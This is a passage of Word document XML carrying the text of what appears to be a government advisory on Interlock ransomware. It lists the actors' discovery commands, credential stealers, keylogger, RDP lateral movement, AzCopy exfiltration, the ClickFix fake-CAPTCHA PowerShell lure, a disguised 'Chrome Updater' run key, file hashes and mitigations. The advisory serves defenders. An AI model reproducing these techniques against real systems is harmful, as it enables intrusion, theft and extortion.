          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>systeminfo Displays detailed configuration information [T1082] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties. tasklist/svc Lists unabridged service information [T1007] for each process currently running on the local computer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Get-Service Gets objects that represent the services [T1007] on a computer, including running and stopped services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Get-PSDrive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Gets the drives [T1082] in the current session, such as: Windows logical drives on the computer, including drives mapped to network shares.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Drives exposed by PowerShell providers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Session-specified temporary drives and persistent mapped network drives.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arp -a Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [T1016], which contains entries on the IPv4 and IPv6 addresses on host endpoints. Command and Control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FBI observed Interlock actors using command and control (C2) [TA0011] applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT5 and NodeSnake RAT (as of March 2025)6 for C2 and executing commands. Credential Access, Lateral Movement, and Privilege Escalation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FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (cht.exe) [TA0006] and keylogger binary (klg.dll) [T1056.001],[T1105]. According to open source reporting, the credential stealer collects login information and associated URLs for victims' online accounts [T1555.003], while the keylogger dynamic link library (DLL) logs users' keystrokes in a file named conhost.txt [T1036.005].7 As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [TA0006], including Lumma Stealer8 and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [T1078].9</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Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)10 [T1021.001] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [T1219].11 In addition to stealing users' online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [T1558.003])12 to gain additional privileges [T1078.002]. Collection and Exfiltration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Interlock actors leverage Azure Storage Explorer (StorageExplorer.exe) to navigate victims' Microsoft Azure Storage accounts [T1530] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [T1567.002].13 Interlock actors also exfiltrate data over file transfer tools, including WinSCP [T1048]. Impact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Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named conhost.exe [T1486],[T1036.005]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [T1486], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.14</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cybersecurity company identified a DLL binary named tmp41.wasd-executed after encryption using rundll32.exe [T1218.011]-which uses the remove() function to delete the encryption binary [T1070.004];15 on Linux machines, the encryptor uses a similar technique to execute the removeme function.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Encrypted files are appended with either a .interlock or .1nt3rlock file extension, alongside a ransom note titled !__README__!.txt delivered via group policy object (GPO). Interlock actors use a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a .onion URL.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Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim's exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.16 Leveraged Tools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See Table 2 for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.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Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Table 2. Tools Used by Interlock Ransomware Actors Tool Name Description AnyDesk A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cobalt Strike A penetration testing tool used by security professionals to test the security of networks and systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PowerShell A cross-platform task automation solution made up of a command- line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PSExec A tool designed to run programs and execute commands on remote systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PuTTY.exe An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ScreenConnect A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect's official cloud domains (domains available upon request from ConnectWise).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SystemBC Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors' C2 servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows Console Host Windows Console Host (conhost.exe) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>WinSCP A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client. Leveraged Files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See Table 3 and Table 4 for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.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Disclaimer: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking. Table 3. Files Used by Interlock Ransomware Actors (SHA-256) File Name Hash 1.ps1 fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd advanced_port_scanner.exe 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5 Aisa.exe 18a507bf1c533aad8e6f2a2b023fbbcac02a477e8f05b095ee29b52b90d47421 AnyDesk.exe 1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069 autoservice.dll a4069aa29628e64ea63b4fb3e29d16dcc368c5add304358a47097eedafbbb565 Autostart.exe d535bdc9970a3c6f7ebf0b229c695082a73eaeaf35a63cd8a0e7e6e3ceb22795 cht FAFCD5404A992850FFCFFEE46221F9B2FF716006AECB637B80E5CD5AA112D79C cht.exe C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07 cleanup.dll (SystemBC) 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127 conhost 44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1 conhost.dll a70af759e38219ca3a7f7645f3e103b13c9fb1db6d13b68f3d468b7987540ddf conhost.dll 96babe53d6569ee3b4d8fc09c2a6557e49ebc2ed1b965abda0f7f51378557eb1 difxepi.dll (SystemBC) 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127 iexplore.exe d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb klg.dll A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E !!!OPEN_ME!!!.txt 68A49D5A097E3850F3BB572BAF2B75A8E158DADB70BADDC205C2628A9B660E7A processhacker-2.39-bin.zip 88f26f3721076f74996f8518469d98bf9be0eaee5b9eccc72867ebfc25ea4e83 PsExec.exe 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b putty.exe 7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069 puttyportable.exe 97931d2e2e449ac3691eb526f6f60e2f828de89074bdac07bd7dbdfd51af9fa0 PuTTYPortable.zip ff7ad2376ae01e4b3f1e1d7ae630f87b8262b5c11bc5d953e1ac34ffe81401b5 qrpce91.exe.asd 64a0ab00d90682b1807c5d7da1a4ae67cde4c5757fc7d995d8f126f0ec8ae983 ScreenConnect.ClientService.exe 2814b33ce81d2d2e528bb1ed4290d665569f112c9be54e65abca50c41314d462 SophosendpointAgent.exe f51b3d054995803d04a754ea3ff7d31823fab654393e8054b227092580be43db SophosScaner.exe dfb5ba578b81f05593c047f2c822eeb03785aecffb1504dcb7f8357e898b5024 Starship.exe 94bf0aba5f9f32b9c35e8dfc70afd8a35621ed6ef084453dc1b10719ae72f8e2 start 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f start.exe 70bb799557da5ac4f18093decc60c96c13359e30f246683815a512d7f9824c8f StorageExplorer.exe 73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66 Sysmon.sys 1d04e33009bcd017898b9e1387e40b5c04279c02ebc110f12e4a724ccdb9e4fb upd_2327991.exe 7b9e12e3561285181634ab32015eb653ab5e5cfa157dd16cdd327104b258c332 webujgd.lnk 70EE22D394E107FBB807D86D187C216AD66B8537EDC67931559A8AEF18F6B5B3 WinSCP-6.3.5-Setup.exe 8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3 Proxy Tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>e4d6fe517cdf3790dfa51c62457f5acd8cb961ab1f083de37b15fd2fddeb9b8f Encryptor e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1 Encryptor c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6 Encryptor 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f Table 4. Files Used by Interlock Ransomware Actors (SHA-1) File Name Hash autorun.log 514946a8fc248de1ccf0dbeee2108a3b4d75b5f6 jar.jar b625cc9e4024d09084e80a4a42ab7ccaa6afb61d pack.jar 3703374c9622f74edc9c8e3a47a5d53007f7721e MITRE ATT&amp;CK Tactics and Techniques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See Table 5 through Table 16 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Table 5. Initial Access Technique Title ID Use Drive-By Compromise T1189</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Interlock actors obtain initial access by compromising a legitimate website that network users visit, or by disguising malicious payloads as fake browser updates or common security software, including the following:17 FortiClient.exe Ivanti-Secure-Access-Client.exe GlobalProtect.exe Webex.exe AnyConnectVPN.exe Cisco-Secure-Client.exe zyzoom_antimalware.exe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Interlock actors also gain access via the ClickFix social engineering technique, in which users are tricked into executing a malicious payload by clicking on a fake CAPTCHA that prompts users to execute a malicious PowerShell script.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Table 6. Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001</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Interlock actors implement PowerShell scripts to drop a malicious file into the Windows Startup folder.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Interlock actors execute a PowerShell command for registry key modification.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Interlock actors use a PowerShell script to execute a series of commands to facilitate reconnaissance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User Execution: Malicious Copy and Paste T1204.004 Via the ClickFix social engineering technique, users are tricked into clicking a fake CAPTCHA and prompted into executing a malicious Base64-encoded PowerShell process by following instructions to open a Windows Run window (Windows Button + R), pasting clipboard contents ("CTRL + V"), and then executing the malicious script ("Enter"). Table 7. Persistence Technique Title ID Use Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder T1547.001</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Interlock actors establish persistence by adding a file into a Windows StartUp folder that executes a RAT every time a user logs in.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Interlock actors also implement registry key modification by using a PowerShell command to add a run key value (named "Chrome Updater") that uses a log file as an argument every time a user logs in.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Table 8. Privilege Escalation Technique Title ID Use Valid Accounts: Domain Accounts T1078.002 Interlock actors compromise domain administrator accounts to gain additional privileges. Table 9. Defense Escalation Technique Title ID Use Defense Evasion TA0005 Interlock actors execute the removeme function on Linux systems to delete the encryption binary for defense evasion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Masquerading: Match Legitimate Resource Name or Location T1036.005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Interlock actors disguise a malicious run key value by naming it "Chrome Updater"; the run key value uses a specific log file as an argument upon user login.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Interlock actors disguise files of keystrokes logged by one of their credential stealers with a legitimate Windows filename: conhost.txt.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Interlock actors disguise an encryption binary, a 64-bit executable, by giving it the same name as the legitimate Console Windows Host executable: conhost.exe System Binary Proxy Execution: Rundll32 T1218.011 Interlock actors use rundll32.exe to proxy execution of a malicious DLL binary tmp41.wasd. Indicator Removal: File Deletion T1070.004 Interlock actors execute a DLL binary tmp41.wasd that uses the remove() function to delete their encryption binary for defense evasion. Table 10. Credential Access Technique Title ID Use Credential Access TA0006 Interlock actors download credential stealer cht.exe and execute other versions information stealers (including Lumma Stealer and Berserk Stealer) to harvest credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Credentials from Password Stores: Credentials from Web Browsers T1555.003 Interlock actors download a credential stealer that collects login information and associated URLs for victims' online accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Input Capture T1056 Interlock actors execute Lumma Stealer and Berserk Stealer information stealers on victim systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Input Capture: Keylogging T1056.001 Interlock actors download klg.dll, a keylogger binary, onto compromised systems, where it logs users' keystrokes in a file named conhost.txt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 Interlock actors possibly use a Kerberoasting attack to compromise domain administrator accounts. Table 11. Discovery Technique Title ID Use System Owner/User Discovery T1033 Interlock actors execute a PowerShell command WindowsIdentity.GetCurrent() on victim systems to retrieve a WindowsIdentity object that represents the current Windows user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Information Discovery T1082</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Interlock actors execute a PowerShell command systeminfo on victim systems to access detailed configuration information about the system, including OS configuration, security information, product ID, and hardware properties.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Interlock actors execute a PowerShell command Get-PSDrive on victim systems to discover the drives in the current session, such as: Windows logical drives on the computer, including drives mapped to network shares.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Drives exposed by PowerShell providers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Session-specified temporary drives and persistent mapped network drives. System Service Discovery T1007</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Interlock actors execute a PowerShell command tasklist /svc on victim systems that lists service information for each process currently running on the system.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Actors also execute a PowerShell command Get-Service on victim systems that retrieves objects that represent the services (including running and stopped services) on the system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Network Configuration Discovery T1016 Interlock actors execute a PowerShell command arp -a on victim systems that displays and modifies entries in the Address Resolution Protocol (ARP) cache table (which contains entries on the IPv4 and IPv6 addresses on host endpoints). Table 12. Lateral Movement Technique Title ID Use Valid Accounts T1078 Interlock actors harvest and abuse valid credentials for lateral movement and privilege escalation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: Remote Desktop Protocol T1021.001 Interlock actors use RDP and valid credentials to move laterally between systems. Table 13. Collection Technique Title ID Use Data from Cloud Storage T1530 Interlock actors use StorageExplorer.exe, the cloud storage solution Azure Storage Explorer, to explore Microsoft Azure Storage accounts. Table 14. Command and Control Technique Title ID Use Command and Control TA0011 Interlock actors use applications Cobalt Strike and SystemBC for C2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ingress Tool Transfer T1105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Interlock actors use a fake Google Chrome or Microsoft Edge browser update to cause users to execute a RAT on the victimized system.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Interlock actors download credential stealers (cht.exe) and keylogger binaries (klg.dll) once actors establish remote control of a compromised system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Access Tools T1219 Interlock actors use legitimate remote access tools such as AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement. Table 15. Exfiltration Technique Title ID Use Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Interlock actors exfiltrate data to cloud storage by executing AzCopy to upload data to the Azure storage blob.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Alternative Protocol T1048 Interlock actors use file transfer tools like WinSCP to exfiltrate data. Table 16. Impact Technique Title ID Use Data Encrypted for Impact T1486</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Interlock actors encrypt victim data using a combined AES and RSA algorithm on compromised systems to interrupt availability to system and network resources. Actors code encryptors using C/C++. Interlock actors use encryptors for both Windows and Linux operating systems.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Interlock actors also use a FreeBSD ELF encryptor to encrypt victim data. Financial Theft T1657 Interlock actors deliver a ransom note titled !__README__!.txt via a GPO which provides victims with instructions to use a .onion URL to contact the actors over the Tor network. Actors use a double-extortion model, both encrypting victim data and threatening release of victim data on their Tor network leak site if the ransom is not paid. Mitigations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authoring agencies recommend organizations implement the mitigations below to improve your organization's cybersecurity posture on the basis of the Interlock ransomware actors' activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections.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addition to the below mitigations, Healthcare and Public Health (HPH) organizations should use HPH Sector CPGs to implement cybersecurity protections to address the most common threats and TTPs used against this sector.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At-risk organizations should implement the following mitigations: Prevent Interlock ransomware actors from obtaining initial access: Implement domain name system (DNS) filtering to block users from accessing malicious sites and applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement web access firewalls to mitigate and prevent unknown commands or process injection from malicious domains or websites.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Train users [CPG 2.I] to identify, avoid, and report social engineering attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a recovery plan [CPG 5.A] to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.R].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST password standards. Require employees to use long passwords [CPG 2.B] and consider not requiring recurring password changes, as these can weaken security. Require MFA [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement ICAM policies across the organization as a precursor to MFA. Keep all operating systems, software, and firmware up to date; prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Timely patching is efficient and cost effective for minimizing an organization's exposure to cybersecurity threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement robust EDR capabilities on VMs, systems, and networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks [CPG 2.F] to prevent the spread of ransomware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Network segmentation can help prevent the spread of ransomware by controlling traffic flows between-and access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to-various subnetworks and by restricting adversary lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware [CPG 3.A] with a networking monitoring tool [CPG 2.T].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement EDR tools; these are useful for detecting lateral connections as they provide insight into common and uncommon network connections for each host. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This prevents threat actors from directly connecting to remote access services that they have established for persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install, regularly update, and enable real time detection for antivirus software on all hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
